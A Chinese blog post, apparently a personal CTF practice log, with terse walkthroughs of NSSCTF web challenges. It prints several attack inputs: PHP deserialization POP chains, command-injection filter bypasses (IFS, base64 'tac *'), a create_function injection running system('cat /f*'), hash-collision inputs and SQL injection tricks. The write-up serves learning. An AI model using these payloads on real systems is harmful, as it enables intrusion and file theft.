NSS刷web(1)

这篇具有很好参考价值的文章主要介绍了NSS刷web(1)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一点点做,简单的也不跳了,就当回忆知识了

[SWPUCTF 2021 新生赛]gift_F12

ctrl+u NSS刷web(1)

[SWPUCTF 2021 新生赛]jicao

NSS刷web(1)

[SWPUCTF 2021 新生赛]easy_md5

NSS刷web(1)

[SWPUCTF 2021 新生赛]easy_sql

NSS刷web(1)
NSS刷web(1)

[SWPUCTF 2021 新生赛]include

NSS刷web(1)

[SWPUCTF 2021 新生赛]easyrce

NSS刷web(1)

[SWPUCTF 2021 新生赛]caidao

NSS刷web(1)

[SWPUCTF 2021 新生赛]babyrce

NSS刷web(1)
NSS刷web(1)

[SWPUCTF 2021 新生赛]Do_you_know_http

改ua xff
NSS刷web(1)
NSS刷web(1)

[SWPUCTF 2021 新生赛]ez_unserialize

访问robots.txt
NSS刷web(1)

<?php
class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="admin";
        $this->passwd = "ctf";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = new wllm();
echo serialize($p);
//O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

NSS刷web(1)

[SWPUCTF 2021 新生赛]easyupload2.0

传phtml
NSS刷web(1)
NSS刷web(1)

[SWPUCTF 2021 新生赛]easyupload1.0

改mime
NSS刷web(1)
NSS刷web(1)

[SWPUCTF 2021 新生赛]no_wakeup

绕过wakeup
低版本php可以让序列化中属性的个数与实际不符来绕过

<?php

class HaHaHa{


        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="admin";
            $this->passwd = "wllm";
        }

        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }

        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }

$p = new HaHaHa();
echo serialize($p);


生成的序列化值
O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
手动改完
O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
NSS刷web(1)

[suctf 2019]EasySQL

我是做不出来的奥
这种sql语句写的属于是第一次见
exp*,1

[ZJCTF 2019]NiZhuanSiWei

读useless源码
NSS刷web(1)
NSS刷web(1)


<?php  

class Flag{  //flag.php  
    public $file = 'flag.php';  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
$p = new Flag();
echo serialize($p);

NSS刷web(1)
NSS刷web(1)

[第五空间 2021]WebFTP

扫目录 存在phpinfo.php
NSS刷web(1)

[BJDCTF 2020]easy_md5

这题是学骚操作的

开局一个框,啥都没了
NSS刷web(1)
php中md5第二个参数传true会转原始二进制,输入ffifdyop
NSS刷web(1)
相当于select * from 'admin' where password=''or'6'
传参后看源码
NSS刷web(1)
NSS刷web(1)
NSS刷web(1)

[SWPUCTF 2021 新生赛]PseudoProtocols

NSS刷web(1)
NSS刷web(1)
NSS刷web(1)

[NISACTF 2022]easyssrf

http://127.0.0.1/flag.php
返回提示/fl4g
NSS刷web(1)
NSS刷web(1)

[SWPUCTF 2021 新生赛]hardrce

NSS刷web(1)

[SWPUCTF 2021 新生赛]error

NSS刷web(1)
NSS刷web(1)
NSS刷web(1)

[SWPUCTF 2021 新生赛]easyupload3.0

NSS刷web(1)
NSS刷web(1)

NSS刷web(1)

[SWPUCTF 2021 新生赛]pop


<?php
class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';
    public function __construct($admin,$passwd){
        $this->admin = $admin;
        $this->passwd = $passwd;
    }
    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$p = new w22m();
$w3 = new w33m();
$p->w00m = $w3;
$w4 = new w44m('w44m','08067');
$w3->w00m = $w4;
$w3->w22m = 'Getflag';
echo urlencode(serialize($p))."\n";

NSS刷web(1)

[NCTF 2018]签到题

NSS刷web(1)

[SWPUCTF 2021 新生赛]sql

NSS刷web(1)
NSS刷web(1)
NSS刷web(1)
NSS刷web(1)

[鹤城杯 2021]EasyP

basename会删除文件开头的非ascii码字符
NSS刷web(1)

[GXYCTF 2019]Ping Ping Ping

NSS刷web(1)
NSS刷web(1)
其它方法
?ip=;ss=g;tac$IFS$9fla$ss.php

;`echo$IFS$9dGFjICo=|base64$IFS$9-d`

[NSSCTF 2022 Spring Recruit]ezgame

NSS刷web(1)

[SWPUCTF 2021 新生赛]finalrce

NSS刷web(1)
NSS刷web(1)
NSS刷web(1)
NSS刷web(1)

[LitCTF 2023]导弹迷踪

NSS刷web(1)

[NISACTF 2022]checkin

NSS刷web(1)
存在不可见字符 ,复制粘贴就行
NSS刷web(1)

[LitCTF 2023]PHP是世界上最好的语言!!

NSS刷web(1)

[LitCTF 2023]我Flag呢?

NSS刷web(1)

[鹏城杯 2022]简单包含

读flag.php 有waf 读index.php
NSS刷web(1)
NSS刷web(1)

[强网杯 2019]随便注

select给ban了 updatexml update 也给ban了
考虑堆叠
NSS刷web(1)
NSS刷web(1)
这里set 和 prepare也ban了

[LitCTF 2023]1zjs

NSS刷web(1)
NSS刷web(1)

[NISACTF 2022]level-up

ctrl+u 有disallow 很像robots.txt
访问
NSS刷web(1)

array1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&array2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

NSS刷web(1)

array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1

NSS刷web(1)
NSS刷web(1)
这里可以
NI+SA+=txw4ever
NI+SA[=txw4ever
但是
NI[SA+=txw4ever
不行 原因是在使用[替换_后,在[后的字符都不会替换
NSS刷web(1)
\create_function&b=}system('cat /f*');?>

[SWPUCTF 2022 新生赛]ez_ez_php

读flag.php知道flag在flag
NSS刷web(1)

[LitCTF 2023]Ping

NSS刷web(1)

[CISCN 2019华东南]Web11

Smarty ssti
NSS刷web(1)
NSS刷web(1)
NSS刷web(1)

[UUCTF 2022 新生赛]websign

view-source:

[NISACTF 2022]babyupload

过滤了.不知道怎么搞了,回去ctrl+u 给了源码
NSS刷web(1)
这里可以直接读flag
传的文件名为/flag在os.path.join的时候因为有/所以path变成/flag
NSS刷web(1)

[HUBUCTF 2022 新生赛]checkin

NSS刷web(1)

[LitCTF 2023]Follow me and hack me

[GDOUCTF 2023]hate eat snake

开着f12进
NSS刷web(1)
Snake.prototype.getScore = function () { return 100 }
我有点不能理解为什么要用原型,没学过js 有空把node学了,应该大同小异
当初做的时候是改的判断条件
NSS刷web(1)
node早晚要学,java结束一定学()

[LitCTF 2023]作业管理系统

弱口令 admin admin
文件上传无过滤

[NISACTF 2022]babyserialize

hint说flag在根目录下
试了一下反引号 system shell_exec file_get_contents $_GET[1]之类的 都给ban了
看wp才知道大小写就能绕

NSS刷web(1)
O:4:"NISA":2:{s:3:"fun";O:8:"Ilovetxw":2:{s:5:"huang";N;s:2:"su";r:1;}s:8:"txw4ever";s:27:"SyStem('cat /fllllllaaag');";}文章来源地址https://www.toymoban.com/news/detail-490254.html

[NISACTF 2022]bingdundun~

到了这里,关于NSS刷web(1)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【c++】:反向迭代器适配器:每天学一点点优秀的思想

        文章目录 前言 一、list的反向迭代器         vector的反向迭代器 总结   反向迭代器的适配只用于双向迭代器,对于单链表实现的单向迭代器是不能通过适配构造一个反向迭代器的,为什么要说反向迭代器适配器呢?因为我们只需要实现一个反向迭代器模板就可以用所有

    2023年04月09日
    浏览(43)
  • pygame里实现导弹追踪效果,同时对python的指针机制有一点点思考

           最近,儿子一直缠着让我把之前给他编写的游戏重做一下,要加一些功能.但是因为之前写代码的时候刚学会python,当时的想法就是能跑就行,现在回头看来,代码的可维护性几乎为零.所以没办法只能冲头再来,重构了几乎所有代码.在编写的时候遇到了一个有意思的问题,儿子

    2024年01月21日
    浏览(384)
  • TypeError: Cannot read properties of undefined (reading ‘dispatch‘)以及一点点的nprogress的错误

    在开发项目中遇到这个bug,记录一下解决办法 在入口文件main.js看注册的store有无大小写错误 版本太高 vue2安装3版本的vuex,默认安装的4版本给vue3用 nprogress 在查看完代码无错误后去翻了一下nprogress的使用教程 发现进度条关闭的方法居然是done()不是end()!!!

    2024年02月14日
    浏览(69)
  • 6.6---每天一点点--- Java基础之==和equals区别并举例说明(总复习+深入版)---详细+举例(小白也能看懂)

    1.== 为运算符,equal 为String数据类型的比较方法 相同内容的对象地址不一定相同,但相相同地址的对象内容一定相同;== 比较的是值是否相等,equal比较的是是否是同一个对象 2.把对象想象成一个房子,而引用则是门牌号。如果两个引用指向同一个房子,那么它们就是相等的

    2024年02月08日
    浏览(43)
  • 【每天学习一点点 day04】工程化 npm create 脚手架 create-vue, vue-cli 执行原理① - npm cli

    希望我们每个人都能找到属于自己的花期,不急不躁,静等风来。 今天打算用 Docusaurus 开始搭建自己的知识库,之前早已有此想法,遗憾的是没有坚持下来。 这次借助这个机会,也计划将自己【每天学习一点点】系列整理在自己的知识库中,方便大家查找。 在使用脚手架命

    2024年02月22日
    浏览(69)
  • 薅羊毛利器—Loon,Cookie放在本地一点也不担心

    Loon Loon是一款在iOS系统下的代理工具( 目前还没有Android版本 ),它支持在本地执行js脚本,只需简单配置即可成为薅羊毛利器 ps 之前的羊毛脚本已经失效了 下载 可以去美区AppStore下载,价格$4.99,需要有一个美区的AppleId账号,并且充值美元 可以去电商平台搜索并购买,价格大

    2024年02月08日
    浏览(46)
  • NSS刷web(1)

    一点点做,简单的也不跳了,就当回忆知识了 ctrl+u 改ua xff 访问robots.txt 传phtml 改mime 绕过wakeup 低版本php可以让序列化中属性的个数与实际不符来绕过 生成的序列化值 O:6:\\\"HaHaHa\\\":2:{s:5:\\\"admin\\\";s:5:\\\"admin\\\";s:6:\\\"passwd\\\";s:4:\\\"wllm\\\";} 手动改完 O:6:\\\"HaHaHa\\\":3:{s:5:\\\"admin\\\";s:5:\\\"admin\\\";s:6:\\\"passwd\\\";s:4:\\\"wllm\\\";}

    2024年02月09日
    浏览(37)
  • 学一点关于JVM类加载的知识

    要研究类加载过程,我们先要知道关于 Java 处理代码的流程是怎么样的。 第一步:编写源代码 这一步是我们最熟悉的,就是我们在 idea 上写的业务代码,生成 Example.java 文件。 第二步:编译源代码 我们通过 java 编译器(如‘javac’)将我们编写的源代码编译成 字节码 。 w

    2024年01月23日
    浏览(40)
  • node.js知识系列(1)-每天了解一点

    👍 点赞,你的认可是我创作的动力! ⭐️ 收藏,你的青睐是我努力的方向! ✏️ 评论,你的意见是我进步的财富! Node.js 是一个基于 Chrome V8 JavaScript 引擎的服务器端运行环境,它允许您使用 JavaScript 编写服务器端应用程序。Node.js 的主要特点包括: 非阻塞、事件驱动 :

    2024年02月07日
    浏览(46)
  • node.js知识系列(2)-每天了解一点

    👍 点赞,你的认可是我创作的动力! ⭐️ 收藏,你的青睐是我努力的方向! ✏️ 评论,你的意见是我进步的财富! 在 Node.js 中,您可以使用 child_process 模块来执行子进程。这允许您在 Node.js 应用程序中启动外部命令或脚本,与它们进行交互并获取输出。 以下是一个简单

    2024年02月07日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包